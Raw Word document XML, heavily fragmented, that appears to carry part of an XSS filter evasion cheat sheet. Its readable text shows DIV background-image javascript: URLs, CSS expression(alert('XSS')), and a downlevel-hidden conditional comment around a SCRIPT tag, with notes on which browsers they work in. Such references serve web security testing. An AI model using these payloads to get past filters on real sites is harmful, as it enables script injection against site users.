                              <a:gd name="T46" fmla="+- 0 365 183"/>
                              <a:gd name="T47" fmla="*/ 36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213" h="183">
                                <a:moveTo>
                                  <a:pt x="5192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192" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5213" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5213" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5195" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="519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Text Box 718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83"/>
                            <a:ext cx="521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&lt;DIV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STYLE="background-image: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url(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javascript:alert('XSS'))"&gt;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7" o:spid="_x0000_s1713" style="position:absolute;margin-left:80.7pt;margin-top:9.15pt;width:260.65pt;height:9.15pt;z-index:-15607296;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,183" coordsize="5213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">
                <v:shape id="Freeform 719" o:spid="_x0000_s1714" style="position:absolute;left:1614;top:183;width:5213;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5213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YNkcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE78J+h/AWvIimLmqlGkWEBfHmH9g9Pppn&#10;W2xeapPW6qc3Cwseh5n5DbNcd6YULdWusKxgPIpAEKdWF5wpOJ++h3MQziNrLC2Tggc5WK8+ektM&#10;tL3zgdqjz0SAsEtQQe59lUjp0pwMupGtiIN3sbVBH2SdSV3jPcBNKb+iaCYNFhwWcqxom1N6PTZG&#10;QTqxg/l+0011e/uZNkUz0M/fRqn+Z7dZgPDU+Xf4v73TCuJxDH9nwhGQq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g2RxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m5192,182l21,182r-3,l,161r,-3l,21,21,,5192,r21,21l5213,161r-18,21l5192,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5192,365;21,365;18,365;0,344;0,341;0,204;21,183;5192,183;5213,204;5213,344;5195,365;5192,365" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 718" o:spid="_x0000_s1715" type="#_x0000_t202" style="position:absolute;left:1614;top:183;width:5213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oJzMEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdC/MP4QruNHUWPqpRZHBgQBBrXczyTnNt&#10;g81NbTJa/94sBJeH816uO1uLG7XeOFYwHiUgiAunDZcKTvn3cAbCB2SNtWNS8CAP69VHb4mpdnfO&#10;6HYMpYgh7FNUUIXQpFL6oiKLfuQa4sidXWsxRNiWUrd4j+G2lp9JMpEWDceGChv6qqi4HP+tgs0v&#10;Z1tz3f8dsnNm8nye8G5yUWrQ7zYLEIG68Ba/3D9awXQc18Yz8Qj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6CczBAAAA3A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&lt;DIV</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="51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STYLE="background-image:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="51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url(</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="5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javascript:alert('XSS'))"&gt;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Balk4"/>
      </w:pPr>
      <w:r>
        <w:t>DIV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Expression</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>variant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effective</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>against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real</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>world</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>filter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newline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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colon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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"expression":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5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0969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104775</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2507615" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="713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7615" cy="116205"/>
                          <a:chOff x="1614" y="165"/>
                          <a:chExt cx="3949" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="714" name="Freeform 716"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="164"/>
                            <a:ext cx="3949" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5542 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3949"/>
                              <a:gd name="T2" fmla="+- 0 347 165"/>
                              <a:gd name="T3" fmla="*/ 347 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3949"/>
                              <a:gd name="T6" fmla="+- 0 347 165"/>
                              <a:gd name="T7" fmla="*/ 347 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3949"/>
                              <a:gd name="T10" fmla="+- 0 347 165"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3949"/>
                              <a:gd name="T14" fmla="+- 0 326 165"/>
                              <a:gd name="T15" fmla="*/ 326 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3949"/>
                              <a:gd name="T18" fmla="+- 0 323 165"/>
                              <a:gd name="T19" fmla="*/ 323 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3949"/>
                              <a:gd name="T22" fmla="+- 0 186 165"/>
                              <a:gd name="T23" fmla="*/ 186 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3949"/>
                              <a:gd name="T26" fmla="+- 0 165 165"/>
                              <a:gd name="T27" fmla="*/ 165 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5542 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3949"/>
                              <a:gd name="T30" fmla="+- 0 165 165"/>
                              <a:gd name="T31" fmla="*/ 165 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5563 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3949"/>
                              <a:gd name="T34" fmla="+- 0 186 165"/>
                              <a:gd name="T35" fmla="*/ 186 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5563 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3949"/>
                              <a:gd name="T38" fmla="+- 0 326 165"/>
                              <a:gd name="T39" fmla="*/ 326 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5545 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3949"/>
                              <a:gd name="T42" fmla="+- 0 347 165"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5542 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3949"/>
                              <a:gd name="T46" fmla="+- 0 347 165"/>
                              <a:gd name="T47" fmla="*/ 34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949" h="183">
                                <a:moveTo>
                                  <a:pt x="392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928" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3949" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3949" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3931" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="392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Text Box 715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4"/>
                            <a:ext cx="394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&lt;DIV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4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STYLE="width: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expression(alert('XSS'));"&gt;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716" style="position:absolute;margin-left:80.7pt;margin-top:8.25pt;width:197.45pt;height:9.15pt;z-index:-15606784;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,165" coordsize="394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">
                <v:shape id="Freeform 716" o:spid="_x0000_s1717" style="position:absolute;left:1614;top:164;width:3949;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="394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61+8QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPTWrDMBCF94HeQUyhu1hWKU1xrYRQCOkmi9g5wNSa&#10;2ibWyLaU2M3po0Khy8f7+Xj5ZraduNLoW8caVJKCIK6cabnWcCp3yzcQPiAb7ByThh/ysFk/LHLM&#10;jJv4SNci1CKOsM9QQxNCn0npq4Ys+sT1xNH7dqPFEOVYSzPiFMdtJ5/T9FVabDkSGuzpo6HqXFxs&#10;5Mr9Sqmh/JqGwg/dIG/z7lBq/fQ4b99BBJrDf/iv/Wk0rNQL/J6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etfvEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m3928,182l21,182r-3,l,161r,-3l,21,21,,3928,r21,21l3949,161r-18,21l3928,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3928,347;21,347;18,347;0,326;0,323;0,186;21,165;3928,165;3949,186;3949,326;3931,347;3928,347" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 715" o:spid="_x0000_s1718" type="#_x0000_t202" style="position:absolute;left:1614;top:164;width:394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umUs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umUs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&lt;DIV</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="54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STYLE="width:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="5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expression(alert('XSS'));"&gt;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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Downlevel-Hidden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Block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3" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="13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1020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760095</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="509270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="710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509270"/>
                          <a:chOff x="1614" y="1197"/>
                          <a:chExt cx="8700" cy="802"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="711" name="Freeform 713"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="1196"/>
                            <a:ext cx="8700" cy="802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1999 1197"/>
                              <a:gd name="T3" fmla="*/ 1999 h 802"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8700"/>
                              <a:gd name="T6" fmla="+- 0 1999 1197"/>
                              <a:gd name="T7" fmla="*/ 1999 h 802"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8700"/>
                              <a:gd name="T10" fmla="+- 0 1998 1197"/>
                              <a:gd name="T11" fmla="*/ 1998 h 802"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8700"/>
                              <a:gd name="T14" fmla="+- 0 1978 1197"/>
                              <a:gd name="T15" fmla="*/ 1978 h 802"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8700"/>
                              <a:gd name="T18" fmla="+- 0 1975 1197"/>
                              <a:gd name="T19" fmla="*/ 1975 h 802"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8700"/>
                              <a:gd name="T22" fmla="+- 0 1218 1197"/>
                              <a:gd name="T23" fmla="*/ 1218 h 802"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8700"/>
                              <a:gd name="T26" fmla="+- 0 1197 1197"/>
                              <a:gd name="T27" fmla="*/ 1197 h 802"/>
                              <a:gd name="T28" fmla="+- 0 10293 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8700"/>
                              <a:gd name="T30" fmla="+- 0 1197 1197"/>
                              <a:gd name="T31" fmla="*/ 1197 h 802"/>
                              <a:gd name="T32" fmla="+- 0 10314 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8700"/>
                              <a:gd name="T34" fmla="+- 0 1218 1197"/>
                              <a:gd name="T35" fmla="*/ 1218 h 802"/>
                              <a:gd name="T36" fmla="+- 0 10314 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8700"/>
                              <a:gd name="T38" fmla="+- 0 1978 1197"/>
                              <a:gd name="T39" fmla="*/ 1978 h 802"/>
                              <a:gd name="T40" fmla="+- 0 10296 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8700"/>
                              <a:gd name="T42" fmla="+- 0 1998 1197"/>
                              <a:gd name="T43" fmla="*/ 1998 h 802"/>
                              <a:gd name="T44" fmla="+- 0 10293 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8700"/>
                              <a:gd name="T46" fmla="+- 0 1999 1197"/>
                              <a:gd name="T47" fmla="*/ 1999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802">
                                <a:moveTo>
                                  <a:pt x="8679" y="802"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="802"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="801"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="781"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="77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781"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8682" y="801"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8679" y="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Text Box 712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196"/>
                            <a:ext cx="8700" cy="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&lt;!--[if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gte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9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IE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9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4]&gt;</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="45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&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="44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&lt;![endif]--&gt;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1" o:spid="_x0000_s1719" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:59.85pt;width:435pt;height:40.1pt;z-index:-15606272;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,1197" coordsize="8700,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">
                <v:shape id="Freeform 713" o:spid="_x0000_s1720" style="position:absolute;left:1614;top:1196;width:8700;height:802;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,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CDRsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvNVNhFqJbkRbivZSqApeH9ln&#10;EpJ9G3fXGP99VxB6HGbmG2axHEwrenK+tqwgHScgiAuray4VHPZfrzMQPiBrbC2Tght5WObPTwvM&#10;tL3yL/W7UIoIYZ+hgiqELpPSFxUZ9GPbEUfvZJ3BEKUrpXZ4jXDTykmSTKXBmuNChR19VFQ0u4tR&#10;INfF58y5enIxzbc7vx1/tv2GlBq9DKs5iEBD+A8/2lut4D1N4X4mHgG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Ag0bEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m8679,802l21,802r-3,-1l,781r,-3l,21,21,,8679,r21,21l8700,781r-18,20l8679,802xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8679,1999;21,1999;18,1998;0,1978;0,1975;0,1218;21,1197;8679,1197;8700,1218;8700,1978;8682,1998;8679,1999" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 712" o:spid="_x0000_s1721" type="#_x0000_t202" style="position:absolute;left:1614;top:1196;width:8700;height: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+Js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3idzuD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0j4mxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA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&lt;!--[if</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454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gte</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E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IE</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E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4]&gt;</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="45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&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="44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&lt;![endif]--&gt;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Only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>works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IE5.0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later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Netscape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>8.1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IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rendering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mode).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>websites</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>consider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>anything</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>inside</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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comment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>block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safe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therefore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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removed,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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allows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>our</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vector.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>comment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>around</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>something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attempt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render</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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harmless.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see,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probably</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>wouldn't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job:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="111"/>
      </w:pPr>
      <w:r>
        <w:t>BASE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Tag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4648"/>
        </w:tabs>
        <w:spacing w:before="102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49248" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3702050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>68580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="154305" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="707" name="Group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305" cy="116205"/>
                          <a:chOff x="5830" y="108"/>
                          <a:chExt cx="243" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="708" name="Picture 7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0" y="108"/>
                            <a:ext cx="24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9" name="Text Box 709"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="5830" y="108"/>
                            <a:ext cx="24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2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//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8" o:spid="_x0000_s1722" style="position:absolute;left:0;text-align:left;margin-left:291.5pt;margin-top:5.4pt;width:12.15pt;height:9.15pt;z-index:-17567232;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="5830,108" coordsize="243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">
                <v:shape id="Picture 710" o:spid="_x0000_s1723" type="#_x0000_t75" style="position:absolute;left:5830;top:108;width:243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HybjBAAAA3AAAAA8AAABkcnMvZG93bnJldi54bWxETztrwzAQ3gv9D+ICWUojp0Nb3CghFALd&#10;Sh6Ds12ti2VsnYx0TZz8+mgodPz43ovV6Ht1ppjawAbmswIUcR1sy42Bw37z/A4qCbLFPjAZuFKC&#10;1fLxYYGlDRfe0nknjcohnEo04ESGUutUO/KYZmEgztwpRI+SYWy0jXjJ4b7XL0Xxqj22nBscDvTp&#10;qO52v95Ar7vj4ad7osrd9vK9DhKvlRgznYzrD1BCo/yL/9xf1sBbkdfmM/kI6O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IHybjBAAAA3AAAAA8AAAAAAAAAAAAAAAAAnwIA&#10;AGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACNAwAAAAA=&#10;">
                  <v:imagedata r:id="rId38" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 709" o:spid="_x0000_s1724" type="#_x0000_t202" style="position:absolute;left:5830;top:108;width:243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86isUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE7wX/Q3iF3mrSHrRujSJiQShI1/Xg8XXz&#10;3A1uXtZN1PXfm0LB4zAz3zDTee8acaEuWM8a3oYKBHHpjeVKw674ev0AESKywcYzabhRgPls8DTF&#10;zPgr53TZxkokCIcMNdQxtpmUoazJYRj6ljh5B985jEl2lTQdXhPcNfJdqZF0aDkt1NjSsqbyuD07&#10;DYs95yt72vz+5IfcFsVE8ffoqPXLc7/4BBGpj4/wf3ttNIzVBP7Op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rzqK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2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//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Works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IE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Netscape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>8.1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safe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mode.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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the</w:t>
